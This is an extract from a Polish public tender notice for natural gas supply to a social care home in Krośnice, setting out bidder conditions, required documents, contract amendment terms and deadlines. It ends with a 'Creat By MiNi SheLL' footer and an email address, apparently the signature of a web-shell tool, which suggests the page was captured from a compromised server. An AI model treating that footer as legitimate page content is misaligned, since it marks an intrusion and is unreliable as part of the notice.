oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Wykonawca spełni powyższy warunek, jeżeli przedstawi aktualną koncesję wydaną w zakresie:<br/>a. obrotu gazem wydana przez Prezesa Urzędu Regulacji Energetyki;<br/>b. dystrybucji gazu wydaną przez Prezesa Urzędu Regulacji Energetyki – w przypadku Wykonawców będących<br/>właścicielami sieci dystrybucyjnej; albo posiadanie aktualnej podpisanej umowy generalnej a Operatorem Systemu<br/>Dystrybucyjnego(OSD) na świadczenie usług dystrybucji gazu na obszarze, na którym znajduje się miejsce dostarczania<br/>gazu ziemnego – w przypadku wykonawców nie będących właścicielami sieci dystrybucyjnej.<br/>3) sytuacji ekonomicznej lub finansowej Wykonawcy:<br/>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest<br/>wykazać w sposób szczególny. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr<br/>4 do SWZ.<br/>4) zdolności technicznej lub zawodowej Wykonawcy:<br/>- Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2 dostaw paliwa gazowego – gazu ziemnego<br/>wysokometanowego typu E o wartości min. 200 000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie wykazu dostaw - załącznik nr 5 do SWZ.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. W postępowaniu może wziąć udział Wykonawca, który będzie polegać na wiedzy i doświadczeniu, potencjale technicznym,<br/>osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków. Spełnieniem warunków udziału w postępowaniu będzie pisemne zobowiązanie tych<br/>podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu<br/>zamówienia lub pisemne oświadczenie Wykonawcy o łączącej go z podmiotem trzecim umowie, na podstawie której podmiot<br/>ten zobowiązuje się do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu<br/>zamówienia.<br/>Podmiot, który zobowiązał się do udostępnienia swoich zasobów, odpowiada solidarnie z Wykonawcą za szkodę<br/>Zamawiającego, powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br/>5. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może<br/>mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych , jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu.<br/>Podmiotowe środki dowodowe obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz.<br/>369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu – załącznik nr 6 do SWZ;<br/>2) Aktualny odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie obrotu gazem ziemnym, wydana przez Prezesa<br/>Urzędu Regulacji Energetyki w zakresie obrotu paliwami gazowymi,<br/>4) Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie dystrybucji gazu ziemnego, wydana przez<br/>Prezesa Urzędu Regulacji Energetyki - w przypadku wykonawców będących Operatorem Systemu Dystrybucyjnego lub<br/>oświadczenia Wykonawcy o posiadaniu aktualnej umowy z Operatorem Systemu Dystrybucyjnego na świadczenie usług<br/>dystrybucji gazu ziemnego na obszarze, na którym znajduje się miejsce odbioru gazu ziemnego - w przypadku<br/>Wykonawców nie będących właścicielem lub operatorem (sieci dystrybucyjnej) Systemu Dystrybucyjnego.<br/>5) Wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>dostawy były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.- według wzoru stanowiącego załącznik nr 5 do SWZ,<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>dokumenty potwierdzające o nie podleganiu wykluczeniu składa każdy z Wykonawców oddzielnie.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa powyżej, składa się w<br/>formie elektronicznej (z kwalifikowanym podpisem elektronicznym), w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty (formularz ofertowy stanowiący załącznik nr 3 do SWZ) każdy Wykonawca musi dołączyć:<br/>a) aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załączniku nr 4 do SWZ - oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia,<br/>b) do oferty należy załączyć formularz cenowy - załącznik nr 3a do SWZ.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów . Wzór oświadczenia stanowi załącznik nr 7 do SWZ (tylko w<br/>przypadku jeżeli dotyczy).<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani dołączyć do oferty oświadczenie<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia według wzoru stanowiącego załącznik nr 8 do SWZ.<br/>Szczegółowa informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia zawarta jest w rozdziale XII<br/>niniejszej SWZ (tylko w przypadku jeżeli dotyczy).<br/>5. Do oferty wykonawca załącza również pełnomocnictwo:<br/>• Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>• W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do<br/>reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>6. Powyższe dokumenty (oferta wraz z załącznikami do oferty) składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Wykonawca może w celu potwierdzenia spełniania warunków udziału w polegać na<br/>zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2. W odniesieniu do warunków dotyczących doświadczenia, wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają świadczenie do<br/>realizacji którego te zdolności są wymagane.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów . Wzór oświadczenia stanowi załącznik nr 7<br/>do SWZ.<br/>4. Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania<br/>warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>5. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie<br/>określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu .<br/>6. UWAGA: Wykonawca nie może, po upływie terminu składania ofert, powoływać się na<br/>zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie<br/>polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby .<br/>7. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniami o których mowa w Rozdziale X<br/>ust. 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z<br/>katalogiem dokumentów określonych w Rozdziale X SWZ<br/>8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>wykonawcy.<br/>11. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W zakresie nieuregulowanym w niniejszym<br/>ogłoszeniu o zamówieniu obowiązują zapisy SWZ wraz z załącznikami, która<br/>stanowi integralną część niniejszego ogłoszenia o zamówieniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr<br/>8 do SWZ):<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają dostawy lub usługi, do realizacji których te zdolności są<br/>wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć<br/>do oferty oświadczenie, z którego wynika, które dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu<br/>opatrzone kwalifikowanym podpisem elektronicznym, a w przypadku postępowań lub<br/>konkursów, o wartości mniejszej niż progi unijne, kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej,<br/>dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia lub notariusz. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wykonawca jest zobowiązany do zawarcia umowy na warunkach określ. w projekcie umowy- Załącznik nr 2 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem z oferty.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy - Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5. Wykonawca zobowiązuje się dostarczyć paliwo gazowe – gaz ziemny wysokometanowy grupy E przy ciśnieniu nie niższym<br/>niż 1,6 kPa do instalacji znajdującej się w następujących obiektach Zamawiającego na adres:<br/>a.a. 56-320 Krośnice, ul. Kwiatowa 2 - grupa taryfowa W-5.1<br/>a.b. 56-320 Krośnice, ul. Kwiatowa 9 - grupa taryfowa W-4<br/>a.c. 56-320 Krośnice, ul. Kwiatowa 9a - grupa taryfowa W-3.6.<br/>6. w sprawach nieuregulowanych umową kompleksową mają zastosowanie przepisy:<br/>a. ustawa z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz.U.2020.833) wraz z przepisami wykonawczymi;<br/>b. ustawa z dnia 10 kwietnia 1964 r, Kodeks Cywilny (Dz. U.2020.1740).<br/>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:<br/>a. wystąpienia siły wyższej, zmian lub okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy, a których<br/>wprowadzenie jest konieczne do prawidłowego wykonania przedmiotu umowy, zgodnie z przepisami Prawa<br/>energetycznego lub wydanymi na tej podstawie przepisami wykonawczymi;<br/>b. zmiany cen jednostkowych, określonych dla kompleksowej dostawy gazu, będącej skutkiem zmian stawki podatku akcyzowego lub zmiany stawki podatku VAT wynikającej z odrębnych przepisów;<br/>c. zmiany organów uprawnionych do reprezentacji zarówno Zamawiającego, jak i Wykonawcy, lub innych danych, które w umowie mają charakter czysto informacyjny;<br/>d. zmiany postanowień treści zawartej umowy w przypadku wystąpienia okoliczności, o których mowa powyżej, za<br/>wyjątkiem zmiany, o której mowa w pkt. c) i d), odbywać się będą w formie pisemnej pod rygorem nieważności;<br/>e. zmiany podmiotu odpowiedzialnego za rozliczanie niezbilansowanego gazu ziemnego dostarczonego i pobranego z systemu;<br/>f. zmiany terminu rozpoczęcia dostaw gazu ziemnego do poszczególnych punktów poboru, jeżeli zmiana ta wynika z okoliczności niezależnych od stron, w szczególności z przedłużającej się procedury zmiany sprzedawcy u Operatora<br/>Systemu Dystrybucyjnego (OSD);<br/>g. regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany;<br/>h. oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;<br/>i. oczywistych omyłek pisarskich i rachunkowych w treści umowy;<br/>j. rezygnacji przez Zamawiającego z punktów poboru wymienionych w niniejszej SWZ w przypadku przekazania, sprzedaży, wynajmu obiektu innemu właścicielowi oraz w przypadku zamknięcia lub likwidacji obiektu;<br/>k. zwiększenia przez Zamawiającego ilości punktów poboru wymienionych w niniejszej SWZ w obrębie grup taryfowych określonych w ofercie Wykonawcy.<br/>Możliwości zmiany umowy zawiera załącznik nr 2 do do SWZ - istotne postanowienia umowne. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę e-zamówienia do dnia 15.11.2024 r. do godziny 10:00. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto Platformie ezamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż<br/>5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem<br/>terminu, o którym mowa w ust. 1, jeżeli w postępowaniu o udzielenie zamówienia prowadzonym<br/>w trybie podstawowym złożono tylko jedną ofertę.<br/>3. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany przed<br/>podpisaniem umowy do wniesienia zabezpieczenia należytego wykonania umowy (jeżeli jego<br/>wniesienie było wymagane) w wysokości i formie określonej w Rozdziale XXI SWZ.<br/>4. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w<br/>sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>5. Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym<br/>przez Zamawiającego.<br/>6. Niedopełnienie powyższych formalności przez wybranego wykonawcę będzie potraktowane<br/>przez zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z<br/>przyczyn leżących po stronie wykonawcy i zgodnie z art. 98 ust. 6 pkt 3 ustawy Pzp, będzie<br/>skutkowało zatrzymaniem przez zamawiającego wadium wraz z odsetkami.<br/>7. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od<br/>zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi wymaganego<br/>zabezpieczenia należytego wykonania umowy, Zamawiający może dokonać ponownego<br/>badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>8. Środki ochrony prawnej określone w niniejszym dziale przysługują wykonawcy, uczestnikowi konkursu oraz innemu<br/>podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia lub<br/>nagrody w konkursie oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez<br/>zamawiającego przepisów ustawy p.z.p.<br/>9. Integralną częścią niniejszego ogłoszenia o zamówieniu jest Specyfikacja Warunków Zamówienia wraz ze wszystkimi załącznikami i<br/>dostępna jest pod adresem: https://ezamowienia.gov.pl/ oraz<br/>http://bip.milicz-powiat.pl/m,77,zamowienia-publiczne.html a także na stronie internetowej DPS Krośnice.

Creat By MiNi SheLL
Email: jattceo@gmail.com